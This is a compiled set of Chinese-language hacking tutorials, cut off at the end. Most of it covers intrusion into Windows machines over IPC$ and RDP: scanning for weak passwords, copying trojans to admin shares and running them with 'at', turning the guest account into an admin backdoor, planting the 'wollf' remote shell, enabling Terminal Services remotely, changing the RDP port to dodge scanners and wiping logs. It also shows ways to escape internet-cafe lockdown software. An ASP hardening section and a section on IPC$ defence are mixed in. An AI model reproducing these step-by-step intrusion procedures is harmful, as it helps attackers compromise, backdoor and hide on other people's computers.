3）向普通共享复制时，要具有相应权限（即对方事先设定的访问权限）；
4）对方可以通过防火墙或安全软件的设置，禁止外部访问共享；

还需要说明一点：不要认为administrator就一定是管理员，管理员名称是可以改的。


4被防火墙杀死或在局域网
也许你的复制操作已经成功，但当远程运行时，被防火墙杀掉了，导致找不到文件；还有可能你把木马复制到了局域网内的主机，导致连接失败。因此建议你复制时要小心，否则就前功尽弃了。


呵呵，大家也知道，ipc$连接在实际操作过程中会出现千奇百怪的问题，上面我所总结的只是一些常见错误，没说到的，只能让大家自己去体会了。


九 如何打开目标的IPC$共享以及其他共享


目标的ipc$不是轻易就能打开的，否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等，然后在shell下执行net share ipc$来开放目标的ipc$，用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹，你可以用net share baby=c:，这样就把它的c盘开为共享名为baby共享了。


十 一些需要shell才能完成的命令


看到很多教程这方面写的十分不准确，一些需要shell才能完成命令就简简单单的在ipc$连接下执行了，起了误导作用。那么下面我总结一下需要在shell才能完成的命令：

1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的操作需要在shell下完成；

2 打开远程主机的ipc$共享，默认共享，普通共享的操作需要在shell下完成；

3 运行/关闭远程主机的服务，需要在shell下完成；

4 启动/杀掉远程主机的进程，也需要在shell下完成。


十一 入侵中可能会用到的相关命令


请注意命令适用于本地还是远程，如果适用于本地，你只能在获得远程主机的shell后，才能向远程主机执行。

1 建立空连接:
net use \IPipc$ "" /user:""

2 建立非空连接:
net use \IPipc$ "psw" /user:"account"

3 查看远程主机的共享资源（但看不到默认共享）
net view \IP

4 查看本地主机的共享资源（可以看到本地的默认共享）
net share

5 得到远程主机的用户名列表
nbtstat -A IP

6 得到本地主机的用户列表
net user

7 查看远程主机的当前时间
net time \IP

8 显示本地主机当前服务
net start

9 启动/关闭本地服务
net start 服务名 /y
net stop 服务名 /y

10 映射远程共享:
net use z: \IPbaby
此命令将共享名为baby的共享资源映射到z盘

11 删除共享映射
net use c: /del 删除映射的c盘，其他盘类推
net use * /del /y删除全部

12 向远程主机复制文件
copy 路径srv.exe \IP共享目录名，如：
copy ccbirds.exe \*.*.*.*c 即将当前目录下的文件复制到对方c盘内

13 远程添加计划任务
at \ip 时间 程序名，如：
at \127.0.0.0 11:00 love.exe
注意：时间尽量使用24小时制；在系统默认搜索路径（比如system32/）下不用加路径，否则必须加全路径


14 开启远程主机的telnet
这里要用到一个小程序：opentelnet.exe，各大下载站点都有，而且还需要满足四个要求：

1）目标开启了ipc$共享
2）你要拥有管理员密码和帐号
3）目标开启RemoteRegistry服务，用户就该ntlm认证
4）对WIN2K/XP有效，NT未经测试
命令格式：OpenTelnet.exe \server account psw NTLM认证方式 port
试例如下：c:>OpenTelnet.exe \*.*.*.* administrator "" 1 90

15 激活用户/加入管理员组
1 net uesr account /active:yes
2 net localgroup administrators account /add

16 关闭远程主机的telnet
同样需要一个小程序：ResumeTelnet.exe
命令格式：ResumeTelnet.exe \server account psw
试例如下：c:>ResumeTelnet.exe \*.*.*.* administrator ""

17 删除一个已建立的ipc$连接
net use \IPipc$ /del

ipc$详细解说大全（4）


十二 ipc$完整入侵步骤祥解

其实入侵步骤随个人爱好有所不同，我就说一下常见的吧，呵呵，献丑了！

1 用扫描软件搜寻存在若口令的主机，比如流光，SSS，X-scan等，随你的便，然后锁定目标，如果扫到了管理员权限的口令，你可以进行下面的步骤了，假设你现在得到了administrator的密码为空


2 此时您有两条路可以选择：要么给对方开telnet（命令行）,要么给它传木马（图形界面），那我们就先走telnet这条路吧


3上面开telnet的命令没忘吧，要用到opentelnet这个小程序
c:>OpenTelnet.exe \192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: [email protected]
OpenTelnet.exe

Usage:OpenTelnet.exe \server username password NTLMAuthor telnetport
*******************************************************
Connecting \192.168.21.*...Successfully!

NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

Starting telnet service...
telnet service is started successfully! telnet service is running!

BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*说明你已经打开了一个端口90的telnet。


4 现在我们telnet上去
telnet 192.168.21.* 90
如果成功，你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了，那么做点什么呢？把guest激活再加入管理组吧，就算留个后门了


5 C:>net user guest /active:yes
*将Guest用户激活，也有可能人家的guest本来就试活的，你可以用net user guest看一下它的帐户启用的值是yes还是no


6 C:>net user guest 1234
*将Guest的密码改为1234,或者改成你喜欢的密码


7 C:>net localgroup administrators guest /add
*将Guest变为Administrator，这样，即使以后管理员更改了他的密码，我们也可以用guest登录了，不过也要提醒您，因为通过安全策略的设置，可以禁止guest等帐户的远程访问，呵呵，如果真是这样，那我们的后门也就白做了，愿上帝保佑Guest。


8 好了，现在我们来走另一条路，给它传个木马玩玩


9 首先，我们先建立起ipc$连接
C:>net use \192.168.21.*ipc$ "" /user:administrator


10 既然要上传东西，就要先知道它开了什么共享
C:>net view \192.168.21.*
在 \192.168.21.*的共享资源
资源共享名 类型 用途 注释

-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了，我们看到对方共享了C,D两个盘，我们下面就可以向任意一个盘复制文件了。再次声明，因为用net view命令无法看到默认共享，因此通过上面返回的结果，我们并不能判断对方是否开启了默认共享。


11 C:>copy love.exe \192.168.21.*c
已复制 1 个文件
*用这个命令你可以将木马客户端love.exe传到对方的c盘下，当然，如果能复制到系统文件夹下是最好的了，不容易被发现


12 运行木马前，我们先看看它现在的时间
net time \192.168.21.*
\192.168.21.*的当前时间是 2003/8/22 上午 11:00
命令成功完成


13 现在我们用at运行它吧，不过对方一定要开了Task Scheduler服务（允许程序在指定时间运行），否则就不行了
C:>at \192.168.21.* 11:02 c:love.exe
新加了一项作业，其作业 ID = 1

ipc$详细解说大全（5）

4 剩下就是等了，等过了11:02，你就可以用控制端去连接了，如果成功你将可以用图形界面去控制远程主机了，如果连接失败，那么它可能在局域网里，也可能程序被防火墙杀了，还可能它下线了（没这么巧吧），无论哪种情况你只好放弃了


嗯，好了，两种基本方法都讲了。如果你对上面的操作已经轻车熟路了，也可以用更高效的套路，比如用CA克隆guest，用psexec执行木马，用命令：psexec \tergetIP -u user -p paswd cmd.exe直接获得shell等，这些都是可以得，随你的便。不过最后不要忘了把日志清理干净，可以用榕哥的elsave.exe。
讲了ipc$的入侵，就不能不说如何防范，那么具体要怎样做呢？看下面


十三 如何防范ipc$入侵


1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)

方法1：
运行regedit，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous = DWORD的键值改为：1
如果设置为"1"，一个匿名用户仍然可以连接到IPC$共享，但限制通过这种连接得到列举SAM帐号和共享等信息；在Windows 2000 中增加了"2"，限制所有匿名访问除非特别授权，如果设置为2的话,可能会有一些其他问题发生，建议设置为1。如果上面所说的主键不存在，就新建一个再改键值。

方法2：
在本地安全设置－本地策略－安全选项－在'对匿名连接的额外限制'中做相应设置


2 禁止默认共享

1）察看本地共享资源
运行-cmd-输入net share

2）删除共享（重起后默认共享仍然存在）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）

3）停止server服务
net stop server /y （重新启动后server服务会重新开启）

4）禁止自动打开默认共享（此操作并未关闭ipc$共享）
运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer（DWORD）的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks（DWORD）的键值改为:00000000。
如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。
这两个键值在默认情况下在主机上是不存在的，需要自己手动添加。


3 关闭ipc$和默认共享依赖的服务:server服务
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-选已禁用
这时可能会有提示说：XXX服务也会关闭是否继续，因为还有些次要的服务要依赖于lanmanserver，不要管它。


4 屏蔽139，445端口
由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。

1）139端口可以通过禁止NBT来屏蔽
本地连接－TCP/IT属性－高级－WINS－选‘禁用TCP/IT上的NETBIOS’一项

2）445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: SystemControlsetServicesNetBTParameters
Name: SMBDeviceEnabled
Type: REG_DWORD
value: 0
修改完后重启机器

注意：如果屏蔽掉了以上两个端口，你将无法用ipc$入侵别人。


3）安装防火墙进行端口过滤


5 设置复杂密码，防止通过ipc$穷举出密码。


十四 ipc$入侵问答精选


上面说了一大堆的理论东西，但在实际中你会遇到各种各样的问题，因此为了给予大家最大的帮助，我看好几个安全论坛，找了n多的帖子，从中整理了一些有代表性的问答，其中的一些答案是我给出的，一些是论坛上的回复，如果有什么疏漏和错误，还请包涵。


1.进行ipc$入侵的时候，会在服务器中留下记录，有什么办法可以不让服务器发现吗？

答：留下记录是一定的，你走后用程序删除就可以了，或者用肉鸡入侵。


2.你看下面的情况是为什么，可以连接但不能复制
net use \***.***.***.***ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe \***.***.***.***admin$
找不到网络路径
命令不成功

答：可能有两个原因：
1）你的权限不够，不能访问默认共享；

2）对方没有开启admin$默认共享，不要认为能进行ipc$连接，对方就一定开了默认共享（很多人都这么以为，误区！！），此时你可以试试别的默认共享或普通共享，比如c$,d$,c,d等，如果还是不行，就要看你的权限了，如果是管理员权限，你可以开telnet,如果能成功，在给它开共享也行。


3.如果对方开了IPC$，且能建立空联接，但打开C、D盘时，都要求密码，我知道是空连接没有太多的权限，但没别的办法了吗？

答：建议先用流光或者别的什么猜解一下密码，如果猜不出来，只能放弃，毕竟空连接的能力有限。


4.我已经猜解到了管理员的密码，且已经ipc$连接成功了，但net view \ip发现它没开默认共享，我该怎么办？

答：首先纠正你的一个错误，用net view是无法看到默认共享的。既然你现在有管理员权限，而且对方又开了ipc$,建议你用opentelnet.exe这个小程序打开它的telent,在获得了这个shell之后，做什么都可以了。


5.ipc$连接成功后，我用下面的命令建立了一个帐户，却发现这个帐户在我自己的机器上，这是怎么回事？
net uset ccbirds /add

答：ipc$建立成功只能说明你与远程主机建立了通信隧道，并不意味你取得了一个shell,只有在获得一个shell之后，你才能在远程建立一个帐户，否则你的操作只是在本地进行。


6.我已进入了一台肉机，用的管理员帐号，可以看他的系统时间，但是复制程序到他的机子上却不行，每次都提示“拒绝访问，已复制0个文件”，是不是对方有什么服务没开，我该怎么办？

答：不能copy文件有多个可能，除了权限不够外，还可能是对方c$,d$等默认管理共享没开，或者是对方为NTFS文件格式，通过设置，管理员也未必能远程写文件。既然你有管理员权限，那就开telnet上去吧，然后在开它的共享。







7.我用Win98能与对方建立ipc$连接吗？

答：不可以的，要进行ipc$的操作，建议用win2000


8.我用net use \ipipc$ "" /user ""成功的建立了一个空会话，但用nbtstat -A IP 却无法导出用户列表，这是为什么？

答：空会话在默认的情况下是可以导出用户列表的，但如果管理员通过修改注册表来禁止导出列表，就会出现你所说的情况；或者你自己的NBT没有打开，netstat是建立在NBT之上的。　　


9.我建立ipc$连接的时候返回如下信息：‘提供的凭据与已存在的凭据集冲突’，怎么回事？

答：呵呵，这说明你与目标主机建立了一个以上的ipc$连接，这是不允许的，把其他的删掉吧：net use \*.*.*.*ipc$ /del


10.我在映射的时候出现：
F:>net use h: \211.161.134.*e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事？

答：你也太粗心了吧，这说明你的h盘正在使用，映射到别的盘符吧！


11.我建立了一个连接f:>net use \*.*.*.*ipc$ "123" /user:"ccbirds" 成功了，但当我映射时出现了错误，向我要密码，怎么回事？
F:>net use h: \*.*.*.*c$
密码在 \*.*.*.*c$ 无效。
请键入 \*.*.*.*c$ 的密码:
系统发生 5 错误。
拒绝访问。

答：呵呵，向你要密码说明你当前使用的用户权限不够，不能映射C$这个默认共享，想办法提升权限或者找管理员的弱口令吧！默认共享一般是需要管理员权限的。


12.我用superscan扫到了一个开了139端口的主机，但为什么不能空连接呢？

答：你混淆了ipc$与139的关系，能进行ipc$连接的主机一定开了139或445端口，但开这两个端口的主机可不一定能空连接，因为对方可以关闭ipc$共享.


13.我门局域网里的机器大多都是xp，我用流光扫描到几个administrator帐号口令是空，而且可以连接，但不能复制东西，说错误5。请问为什么？

答：xp的安全性要高一些，在安全策略的默认设置中，对本地帐户的网络登录进行身份验证的时候，默认为来宾权限，即使你用管理员远程登录，也只具有来宾权限，因此你复制文件，当然是错误5：权限不够。


14.我用net use \192.168.0.2ipc$ "password" /user:"administrator" 成功，可是 net use i: \192.168.0.2c
出现请键入 \192.168.0.2 的密码，怎么回事情呢？

答：虽然你具有管理员权限，但管理员在设置c盘共享权限时可能并未设置允许administrator访问，所以会出现问题。

常见ASP脚本攻击及防范技巧

由于ASP的方便易用，越来越多的网站后台程序都使用ASP脚本语言。但是， 由于ASP本身存在一些安全漏洞，稍不小心就会给黑客提供可乘之机。事实上，安全不仅是网管的事，编程人员也必须在某些安全细节上注意，养成良好的安全习惯，否则会给自己的网站带来巨大的安全隐患。目前，大多数网站上的ASP程序有这样那样的安全漏洞，但如果编写程序的时候注意一点的话，还是可以避免的。

　　1、用户名与口令被破解

　　攻击原理：用户名与口令，往往是黑客们最感兴趣的东西，如果被通过某种方式看到源代码，后果是严重的。

　　防范技巧：涉及用户名与口令的程序最好封装在服务器端，尽量少在ASP文件里出现，涉及与数据库连接的用户名与口令应给予最小的权限。出现次数多的用户名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及与数据库连接，在理想状态下只给它以执行存储过程的权限，千万不要直接给予该用户修改、插入、删除记录的权限。

　　2、验证被绕过

　　攻击原理：现在需要经过验证的ASP程序大多是在页面头部加一个判断语句，但这还不够，有可能被黑客绕过验证直接进入。

　　防范技巧：需要经过验证的ASP页面，可跟踪上一个页面的文件名，只有从上一页面转进来的会话才能读取这个页面。
3、inc文件泄露问题

　　攻击原理：当存在ASP的主页正在制作且没有进行最后调试完成以前，可以被某些搜索引擎机动追加为搜索对象。如果这时候有人利用搜索引擎对这些网页进行查找，会得到有关文件的定位，并能在浏览器中查看到数据库地点和结构的细节，并以此揭示完整的源代码。

　　防范技巧：程序员应该在网页发布前对它进行彻底的调试；安全专家则需要加固ASP文件以便外部的用户不能看到它们。首先对.inc文件内容进行加密，其次也可以使用.asp文件代替.inc文件使用户无法从浏览器直接观看文件的源代码。inc文件的文件名不要使用系统默认的或者有特殊含义容易被用户猜测到的名称，尽量使用无规则的英文字母。

　　4、自动备份被下载

　　攻击原理：在有些编辑ASP程序的工具中，当创建或者修改一个ASP文件时，编辑器自动创建一个备份文件，比如：UltraEdit就会备份一个.bak文件，如你创建或者修改了some.asp，编辑器会自动生成一个叫some.asp.bak文件，如果你没有删除这个bak文件，攻击者可以直接下载some.asp.bak文件，这样some.asp的源程序就会被下载。

　　防范技巧：上传程序之前要仔细检查，删除不必要的文档。对以BAK为后缀的文件要特别小心。

　　5、特殊字符

　　攻击原理：输入框是黑客利用的一个目标，他们可以通过输入脚本语言等对用户客户端造成损坏；如果该输入框涉及数据查询，他们会利用特殊查询语句，得到更多的数据库数据，甚至表的全部。因此必须对输入框进行过滤。但如果为了提高效率仅在客户端进行输入合法性检查，仍有可能被绕过。

　　防范技巧：在处理类似留言板、BBS等输入框的ASP程序中，最好屏蔽掉HTML、javascript、VBscript语句，如无特殊要求，可以限定只允许输入字母与数字，屏蔽掉特殊字符。同时对输入字符的长度进行限制。而且不但要在客户端进行输入合法性检查，同时要在服务器端程序中进行类似检查6、数据库下载漏洞

　　攻击原理：在用Access做后台数据库时，如果有人通过各种方法知道或者猜到了服务器的Access数据库的路径和数据库名称，那么他也能够下载这个Access数据库文件，这是非常危险的。

　　防范技巧：

　　（1）为你的数据库文件名称起个复杂的非常规的名字，并把它放在几层目录下。所谓 “非常规”， 打个比方说，比如有个数据库要保存的是有关书籍的信息， 可不要给它起个“book.mdb”的名字，而要起个怪怪的名称，比如d34ksfslf.mdb， 并把它放在如./kdslf/i44/studi/的几层目录下，这样黑客要想通过猜的方式得到你的Access数据库文件就难上加难了。

　　（2）不要把数据库名写在程序中。有些人喜欢把DSN写在程序中，比如：

　　DBPath = Server.MapPath（“cmddb.mdb”）

　　conn.Open “driver={Microsoft Access Driver （*.mdb）}；dbq=” & DBPath

　　假如万一给人拿到了源程序，你的Access数据库的名字就一览无余了。因此建议你在ODBC里设置数据源，再在程序中这样写：

　　conn.open“shujiyuan”

　　（3）使用Access来为数据库文件编码及加密。首先在“工具→安全→加密/解密数据库”中选取数据库（如：employer.mdb），然后按确定，接着会出现“数据库加密后另存为”的窗口，可存为：“employer1.mdb”。

　　要注意的是，以上的动作并不是对数据库设置密码，而只是对数据库文件加以编码，目的是为了防止他人使用别的工具来查看数据库文件的内容。

　　接下来我们为数据库加密，首先打开经过编码了的 employer1.mdb，在打开时，选择“独占”方式。然后选取功能表的“工具→安全→设置数据库密码”，接着输入密码即可。这样即使他人得到了employer1.mdb文件，没有密码他也是无法看到 employer1.mdb中的内容

37秒迅速破解网吧


在的不光是美萍了,还有就是幻境
:-)我说一下破它的办法:

媒体对美萍的漏洞说了许多，但我们这儿的网吧用的是万象幻境，一时好奇想看看它有没有漏洞，就试了试，没想到让我发现了许多，今天为你介绍最简单的几种方法--两分钟即可破解万象幻境的方法。


先来说说网管类软件的原理。其实，网管类软件不过是个外壳程序而已，它先于其他一切程序加载，提供一个受密码保护的界面，一般用户只能通过这个界面调用一些被允许的程序。为加强管理，网管类软件都有密码保护，封锁热键等功能，如今更是做到了客户机/服务器模式、数据库管理。也因此招徕了许多网友的不满，一时，反抗之声不绝于耳。


破解的关键在于如何能访问硬盘，因为你要执行的文件或寻找万象幻境的密码都离不开硬盘。那么如何进入硬盘呢？往下看，共为你准备了10种方法：


1.利用输入法漏洞


输入法漏洞不是中文Win2000的漏洞吗？没错！不过万象幻境也有这个漏洞！方法很简单：按ctrl+shift打开[M$]拼音输入法(如没有用其它输入法也可，方法类似)，然后将光标插入会员卡号的文本输入框内，接着开始往里面输入任意一个拼音字母，然后就会出现拼音的状态条，在状态条上点击右键，或用键盘上的属性键，就会出现一个下拉菜单，选择其中的定义词组(放心，就算系统限制右键，在这也不管用)然后选择文件菜单里面的保存，就会调出保存对话框，然后随便选择一个文件夹，点击右键，选择资源管理器，打开，一切就OK啦！如果鼠标被限定在那个锁定窗口内，就用键盘操作。


2.利用QQ


网吧别的软件可以没有，但QQ绝对会有，否则就不会有那么多人去网吧了。打开QQ，随便选择一个好友，点传送文件， 就会出现一个小窗口，让你选择文件，呵呵 ，秘密就在这里，先找到C盘下的注册表编辑器Regedit.exe，先用鼠标选中该文件，松开鼠标，用鼠标右键点击该文件，这时千万不要松开右键，点鼠标左键，就会出来右键菜单，里面什么都有，删除，打开，复制，呵呵，和不在美萍的限制下一样的，这下你想干什么就可以干什么了。


3.利用Foxmail或Outlook Express


以Foxmail为例来讲讲，Outlook Express类同。点“邮件”－>“写新邮件”，在出现的“写邮件”窗口中点击“邮件”菜单下的“增加附件”，就会调出“打开”对话框，可以看到驱动器列表和目录列表了，想怎么样自己看着办吧！


4.利用TE


TE是QQ附带的浏览器，启动它，在地址栏直接输入C：回车，看看出现什么了？哈哈，C盘尽在眼前。但到了C盘有什么用呢，如果网管做了手脚，你还是不能执行文件。但是当我们用鼠标右键点上你要执行的文件(注意，是鼠标的右键)，此时没有任何反映。此时不要松开鼠标右键，再按下鼠标左键，哈哈，看到鼠标正常的右键菜单了吧。这时点击"打开"选项，文件就被打开了。


5.用看图软件Acdsee


如果网吧中有这个软件，利用它的浏览功能，可以轻松的找到任何一个文件！呵呵，它的浏览功能帮过我不少忙，其实只要是有驱动器列表和目录列表控件的软件几乎都可以被利用，因为那是Windows的标准控件，一般是很难屏蔽的。


6.升级网吧管理专家


你可以“好心”的帮网吧管理者把网吧管理专家升级一下，那就什么密码也没有了，想干什么都可以了。不过，被发现了暴扁一顿可别来找我。


7.利用IE


先打开IE，再打开“收藏”菜单，用鼠标将“链接”拖入IE地址栏下面的空白区，然后点击“向上”、“向上”、再“向上”，看到了什么？对了，是C盘根目录！此时已经可以按方法5中所说方法为所欲为了。


8.Win98登入过程


在进入Win98登入过程中，网吧管理专家把鼠标锁定在右边的时候，左键单击屏幕，然后按F1键(多按几次)在彻底出现登入窗口的时候，如果成功的话会出现“Windows帮助”窗口，在“选项”下拉菜单中选择“按Web 帮助”，在“Web 帮助”窗口中点击“联机支持”的链接，这时弹出一个Internet Explorer浏览器了。只要在地址栏中输入要访问的站点(如在地址栏里输入http://www.sina.com.cn)或盘符(如c盘 c: )，如果网吧管理专家对硬盘进行保护使我们没法访问某个盘符时，可以用按“F3”键(windows默认的查找热键)弹出一个查找窗口后，输入你想打开的文件或文件夹进行查找，找到后即可打开。


9.桌面快捷方式


对桌面上的快捷方式点击右键，在弹出的菜单中选择“属性”－>“更改图标”－>“浏览”，可以打开文件浏览窗口，看是不是C盘出来了，然后点击向上到C盘windows文件夹找到系统工具的系统配置实用程序将自启动程序去掉，重启机器这样就可以啦！


10.Ctrl+Alt+Del


上面说的方法太麻烦了，这个简单。在看到窗口的画面时就按Ctrl+Alt+Del，大家会看到一个client项。结束它，但这时候还不行。过一会儿还会启动一次，再按Ctrl+Alt+Del结束它(这个步骤很不好使，要试好多次才能掌握)，太快不行，太慢也不行，试多了就行了，最后你就会百试百灵 。有的网吧管理专家下了补丁，会运行多一次，你再多结束一次任务就行了。

开启3389的5种方法（上）


一:使用的工具:
1:ipcscan扫描器
2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IP:Port )
3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)
4:cscript (在system32文件夹下;98操作系统可能没有
二:步骤:
1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发)

2:用rots.vbs开启终端服务

说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]

格式 cscript.exe rots.vbs ip user userpass port /r
或者 cscript.exe rots.vbs ip user userpass port /fr


三:常见问题:

1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了.

2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧.

3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.
　

　

==========================================================================================
第二种方法：
==========================================================================================
进入后：TELNET上去！

c:>echo [Components] > c:rock
c:>echo TSEnable = on >> c:rock
c:>sysocmgr /i:c:winntinfsysoc.inf /u:c:rock /q
或者！
c:>echo [Components] > d:wawa
c:>echo TSEnable = on >> d:wawa
c:>sysocmgr /i:c:winntinfsysoc.inf /u:d:wawa /q
等会自动启后就OK


或者：
在本地利用DOS命令edit建立.bat后缀批处理文件（文件名随意） echo [Components] > c:sql

echo TSEnable = on >>

c:sqlsysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q

net use \ip地址ipc$ 密码 /user:用户名（一般默认:administrator)

利用at time 获取对方服务器时间。

copy 路径:xxx.bat \ip地址$c:winnt

at time 00:00:00 xxx.bat

服务器执行命令后，服务器将重新启动，利用3389登陆就OK了！
　

　

==========================================================================================

第三种方法：
==========================================================================================
进入后,先检查终端组件是否安装:
c:>query user
这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.
---------------------------------------------------
C:>dir c:sysoc.inf /s //检查INF文件的位置
c:WINNTinf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:> dir c:sysocmgr.* /s //检查组件安装程序
c:WINNTsystem32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:>echo [Components] > c:rock
c:>echo TSEnable = on >> c:rock
//这是建立无人参与的安装参数
c:>type c:rock
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:>sysocmgr /i:c:winntinfsysoc.inf /u:c:rock /q
-----------------------------------------------------

这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.

问题和建议:

A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.

B 一次不行可以再试一次,在实际中很有作用.

C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错，所以会有B的建议.
　

　

==========================================================================================
第四种方法：
==========================================================================================

C:documents and Settingsshanlu.XZGJDOMAIN>net use \218.22.155.*ipc$ "" /us
er:administrator----------------连接成功！
命令成功完成。

C:documents and Settingsshanlu.XZGJDOMAIN>copy wollf.exe \218.22.155.*admi
n$------------------------------拷贝wollf.exe到目标计算机的admin$目录
已复制 1 个文件。

C:documents and Settingsshanlu.XZGJDOMAIN>copy hbulot.exe \218.22.155.*adm
in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录
已复制 1 个文件。

C:documents and Settingsshanlu.XZGJDOMAIN>net time \218.22.155.*
\218.22.155.* 的当前时间是 2002/12/1 上午 06:37
命令成功完成。

C:documents and Settingsshanlu.XZGJDOMAIN>at \218.22.155.* 06:39 wollf.exe
新加了一项作业，其作业 ID = 1--指定wollf.exe在06:39运行
------------------------------------------------------------------------------------------
说明：
wollf.exe是一个后门程序，很多高手都喜欢nc或者winshell，不过我对他情有独钟！在这里我只介绍与本文内

容有关的命令参数，它的高级用法不做补充。
hbulot.exe是用于开启3389服务，如果不是server及以上版本，就不要运行了。因为pro版不能安装终端服务。
2分钟后......

开启3389的5种方法（下）


------------------------------------------------------------------------------------------
C:documents and Settingsshanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org/
------------------------------------------------------------------------------------------
说明：
使用wollf连接时要注意wollf.exe要在当前目录，它的连接命令格式：wollf -connect IP 7614
7614是wollf开放的端口。如果显示如上，说明你已经连接成功，并具有管理员administrator权限。

------------------------------------------------------------------------------------------
[server@D:WINNTsystem32]#dos

Microsoft Windows 2000 [Version 5.00.2195]
© 版权所有 1985-2000 Microsoft Corp.
------------------------------------------------------------------------------------------
说明：
输入dos,你就会进入目标机的cmd下，这时同样具有administrator权限。


------------------------------------------------------------------------------------------
D:WINNTsystem32>cd..
cd..

D:WINNT>dir h*.*
dir h*.*
驱动器 D 中的卷没有标签。
卷的序列号是 1CE5-2615

D:WINNT 的目录

2002-11-27 03:07 <DIR> Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 个文件 35,328 字节
1 个目录 9,049,604,096 可用字节

D:WINNT>hbulot
hbulot
------------------------------------------------------------------------------------------
说明：
因为我们把HBULOT.exe放到目标机的admin$下的，所以先找到它，以上是文件的存放位置。


==========================================================================================
D:WINNT>exit
exit

Command "DOS" succeed.

[server@D:WINNTsystem32]#reboot


Command "REBOOT" succeed.

[server@D:WINNTsystem32]#
Connection closed.
------------------------------------------------------------------------------------------
说明：
由dos退到wollf的连接模式下用exit命令，HBULOT.exe运行后需重新启动方可生效，这里wollf自带的REBOOT
命令，执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放，方法很多，superscan3扫一下

。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本，就不要运行了。因为pro版不能安装

终端服务。

到这里，你已经拥有3389肉鸡了！但是会不会被别的入侵者发现呢？下面所教的就是怎么让3389只为你服务！

我们现在使用的3389登陆器有两种版本，一种是2000/98，一种是XP。二者区别呢？前者使用的默认端口3389对

目标，后者默认的也是3389端口，但是它还支持别的端口进行连接！所以呢......我们来修改3389的连接端口

来躲过普通扫描器的扫描！修改方法如下：
修改服务器端的端口设置 ，注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp]
PortNumber值，默认是3389，修改成所希望的端口，比如1314
第二个地方：
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]　
PortNumber值，默认是3389，修改成所希望的端口，比如1314
现在这样就可以了。重启系统吧。
注意：事实上，只修改第二处也是可以的。另外，第二处的标准联结应该是
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStations<connection>
<connection>表示具体的某个RDP-TCP连结。
重启过后，看看端口有没有改。
小技巧：修改注册表键值时，先选择10进制，输入你希望的端口数值，再选择16进制，系统会自动转换。
　

==========================================================================================
第五种方法：
==========================================================================================

　
一.原理性基本安装
1.将如下注册表键值导入 "肉机" 的注册表中:

-------------

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
etcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
"ShutdownWithoutLogon"="0"

